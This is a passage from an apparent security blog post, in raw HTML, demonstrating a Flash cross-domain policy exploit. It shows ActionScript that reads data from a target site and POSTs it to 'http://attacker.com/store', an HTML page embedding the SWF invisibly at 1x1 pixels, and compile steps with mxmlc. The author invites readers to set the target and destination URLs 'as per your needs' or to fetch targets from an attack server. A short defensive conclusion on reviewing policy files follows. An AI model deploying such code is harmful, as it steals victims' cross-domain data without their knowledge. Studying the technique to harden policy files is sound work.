<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>getLoader.load(readRequest);</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>} catch (error:Error) {</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>trace("Error loading URL: " + error);</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<br />
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>private function eventHandler(event:Event):void {</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>// URL to which retrieved data is to be sent</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>var sendTo:String = "http://attacker.com/store"</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>var sendRequest:URLRequest = new URLRequest(sendTo);</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>sendRequest.method = URLRequestMethod.POST;</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>sendRequest.data = event.target.data;</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>var sendLoader:URLLoader = new URLLoader();</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>try {</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>sendLoader.load(sendRequest);</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>} catch (error:Error) {</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>trace("Error loading URL: " + error);</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">}</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<br />
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The following HTML file can be used to embed the flash file for delivery.</span></div>
<div dir="ltr">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="638"></col></colgroup><tbody>
<tr style="height: 0px;"><td style="background-color: #d9d9d9; border: 1px solid #000000; padding: 0px 7px 0px 7px; vertical-align: top;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 12pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><html></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><object type="application/x-shockwave-flash" data="XDomainXploit.swf" width="1" height="1"></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-left: 72pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><param name="movie" value="XDomainXploit.swf" /></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></object></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></html></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<br />
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The code along with a README is also uploaded to GitHub repository which can be found </span><a href="https://github.com/gursev/flash-xdomain-xploit" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">here</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Compiling and deploying the ActionScript code</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I used Apache Flex SDK to compile the ActionScript code and you can follow the below provided steps to get your exploit working.</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Download and install </span><a href="http://flex.apache.org/installer.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Apache Flex SDK</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> that comes with an ActionScript compiler.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Copy the ActionScript code to your local directory and name it XDomainXploit.as.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Change the values of </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">readFrom</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">sendTo</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> parameters to appropriate values as per your needs.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Compile the code with the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">mxmlc</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> compiler to a Flash file by running the following command. The </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">mxmlc</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> compiler is shipped with Apache Flex.</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">mxmlc XDomainXploit.as</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<ol start="5" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Deploy the generated Swf and the provided HTML files to enjoy the Flash goodness.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqCmYEPRhK7_a_MYMVdmA26NPnQTs447jeYMfdherkQtuoq4Q7aNPHT_EYdNxddSbgW3u4_F2rN-ZbG9X2732q-efyuT1bZ4MnCr2K_oc79VUVOjUgY__Rqp2xzzic_h0bU7lkRUoa95xO/s1600/compiling.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="43" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqCmYEPRhK7_a_MYMVdmA26NPnQTs447jeYMfdherkQtuoq4Q7aNPHT_EYdNxddSbgW3u4_F2rN-ZbG9X2732q-efyuT1bZ4MnCr2K_oc79VUVOjUgY__Rqp2xzzic_h0bU7lkRUoa95xO/s400/compiling.png" width="400" /></a></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1; margin-bottom: 10pt; margin-top: 0pt;">
<div style="text-align: center;">
<span style="background-color: transparent; color: #4f81bd; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Figure 1: Image shows ActionScript compile operation</span></div>
</div>
<div dir="ltr" style="line-height: 1; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #4f81bd; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-left: 18pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Below you will see the exploit in action.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9av8p-Dt5apDb1-ConKL9O25-goB4U3oMy2bl012X_VSoqofhMWCM_pwHwNOI0Wti1URMXlUBnLg-fg9Fk3d8U4kzHzL8AGJuwYQ6s-wwRyXStnKeuHlnuiFPv8jle4El26Xg6cFCk1NR/s1600/proxy-sequence-labeled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="209" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9av8p-Dt5apDb1-ConKL9O25-goB4U3oMy2bl012X_VSoqofhMWCM_pwHwNOI0Wti1URMXlUBnLg-fg9Fk3d8U4kzHzL8AGJuwYQ6s-wwRyXStnKeuHlnuiFPv8jle4El26Xg6cFCk1NR/s400/proxy-sequence-labeled.png" width="400" /></a></div>
</div>
<div dir="ltr" style="line-height: 1; margin-bottom: 10pt; margin-top: 0pt;">
<div style="text-align: center;">
<span style="background-color: transparent; color: #4f81bd; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Figure 2: Image shows the sequence of requests during PoC execution</span></div>
<span style="background-color: transparent; color: #4f81bd; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: Calibri; font-size: 15px; font-weight: normal; vertical-align: baseline;">The code example above uses hard coded values for </span><span style="font-family: 'Courier New'; font-size: 15px; font-weight: normal; vertical-align: baseline;">readFrom</span><span style="font-family: Calibri; font-size: 15px; font-weight: normal; vertical-align: baseline;"> and </span><span style="font-family: 'Courier New'; font-size: 15px; font-weight: normal; vertical-align: baseline;">sendTo</span><span style="font-family: Calibri; font-size: 15px; font-weight: normal; vertical-align: baseline;"> parameters in ActionScript code but you can have Flash retrieve these fields from your HTML page using ActionScript’s </span><a href="http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/external/ExternalInterface.html" style="font-family: 'Times New Roman'; font-weight: normal; line-height: 1.1500000000000001; text-decoration: none; white-space: normal;"><span style="color: blue; font-family: Calibri; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">ExternalInterface</span></a><span style="font-family: Calibri; font-size: 15px; font-weight: normal; vertical-align: baseline;"> class or make the ActionScript to retrieve targets from your attack server at runtime. </span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;"><br /></span></span>
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Conclusion</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Carefully analyze the proposed cross-domain application architecture from security perspective before deploying new or updated cross-domain policy files and make sure that exposure is minimal by not having overly permissive entries in your files. Consider reviewing the following two documents from Adobe that have extensive information on Adobe Flash Player security.</span></div>
<br />
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
